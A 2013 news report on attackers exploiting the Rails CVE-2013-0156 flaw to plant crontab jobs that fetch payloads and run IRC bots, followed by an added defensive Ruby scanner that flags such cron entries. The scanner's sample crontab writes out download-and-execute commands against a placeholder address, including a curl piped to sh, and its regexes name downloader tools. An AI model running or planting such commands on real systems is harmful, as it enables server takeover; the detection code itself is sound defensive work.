29 May 2013
A known critical flaw in Ruby on Rails (CVE-2013-0156) is being exploited in the wild, although it was patched months ago. The flaw, originally disclosed in January, is being abused by criminals to take control of servers that are still running vulnerable versions.
According to reports on GitHub, the attackers are installing malicious scheduled tasks via crontab that download and execute additional payloads on the server. One such payload downloads a source file, compiles it locally and sets up an IRC bot on the server that can be remotely controlled.
“Functionality is limited, but includes the ability to download and execute files as commanded, as well as changing servers. There’s no authentication performed, so an enterprising individual could hijack these bots fairly easily by joining the IRC server and issuing the appropriate commands,” wrote security researcher Jeff Jarmoc in an analysis on his blog.
The compromised servers are then controlled remotely from a variety of locations, including Germany, the United Kingdom and Ukraine. According to Jarmoc, the issue has also been identified on web hosting services that had not patched their installations.
Users who run vulnerable versions of Ruby on Rails are advised to upgrade to a patched release immediately to avoid server compromise.
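The persistence described above leaves a visible trace: a cron job that fetches and runs a remote payload, or compiles something it has just downloaded. The following scanner is an added example, not code from the article or from Jarmoc's analysis; it parses user-crontab text and flags entries that match those patterns. The sample crontab, including the 203.0.113.10 address and the file names, is constructed for illustration.

```ruby
# Added example: scan crontab text for download-and-execute jobs of the kind
# reported for the CVE-2013-0156 campaign. Not the article's or Jarmoc's code.

CRON_FIELDS = 5 # minute hour day-of-month month day-of-week (user crontab)

# Command fragments that, together, characterise the reported persistence.
DOWNLOADERS   = /\b(curl|wget|fetch|lwp-download)\b/
PIPE_TO_SHELL = /\|\s*(ba)?sh\b|\|\s*perl\b|\|\s*python\b/
COMPILERS     = /\b(gcc|cc|clang|tcc)\b/
TMP_EXEC      = %r{(/tmp|/var/tmp|/dev/shm)/\S+}

# Returns [schedule, command] for a crontab line, or nil for blank lines,
# comments and VAR=value assignments.
def parse_cron_line(line)
  line = line.strip
  return nil if line.empty? || line.start_with?('#')
  return nil if line =~ /\A\w+=/          # environment assignment (MAILTO=...)
  if line.start_with?('@')                 # @reboot, @hourly, ...
    sched, cmd = line.split(/\s+/, 2)
    return cmd ? [sched, cmd] : nil
  end
  parts = line.split(/\s+/, CRON_FIELDS + 1)
  return nil if parts.size <= CRON_FIELDS
  [parts[0, CRON_FIELDS].join(' '), parts[CRON_FIELDS]]
end

# Lists the reasons a cron command looks like a dropper; empty means benign.
def classify(cmd)
  reasons = []
  reasons << 'downloads a remote file'                        if cmd =~ DOWNLOADERS
  reasons << 'pipes output into an interpreter'               if cmd =~ PIPE_TO_SHELL
  reasons << 'compiles source locally'                        if cmd =~ COMPILERS
  reasons << 'executes from a world-writable temp directory'  if cmd =~ TMP_EXEC
  reasons
end

# Scans a whole crontab (as returned by `crontab -l`) and returns findings
# with the 1-based line number, schedule, command and matched reasons.
def scan_crontab(text)
  findings = []
  text.each_line.with_index(1) do |line, n|
    parsed = parse_cron_line(line)
    next unless parsed
    sched, cmd = parsed
    reasons = classify(cmd)
    next if reasons.empty?
    findings << { line: n, schedule: sched, command: cmd, reasons: reasons }
  end
  findings
end

# Constructed sample crontab: two legitimate jobs and two jobs shaped like the
# reported persistence (download + compile + run; download piped to sh).
SAMPLE_CRONTAB = <<~CRON
  # constructed sample; not a real captured crontab
  MAILTO=""
  0 3 * * * /usr/bin/certbot renew --quiet
  */5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
  * * * * * cd /tmp; wget -q http://203.0.113.10/k.c -O /tmp/k.c; gcc /tmp/k.c -o /tmp/k; /tmp/k
  @reboot curl -s http://203.0.113.10/p.sh | sh
CRON

if __FILE__ == $0
  scan_crontab(SAMPLE_CRONTAB).each do |f|
    puts "line #{f[:line]} [#{f[:schedule]}]: #{f[:command]}"
    f[:reasons].each { |r| puts "  - #{r}" }
  end
end
```

To use it on a live host, feed it the output of `crontab -l -u <user>` for every account and the contents of /etc/cron.d; the system crontab and cron.d files carry an extra user field after the schedule, so adjust CRON_FIELDS to 6 for those. A match is a lead, not proof: legitimate jobs also use curl and wget, so review the flagged command and the file it fetches before acting.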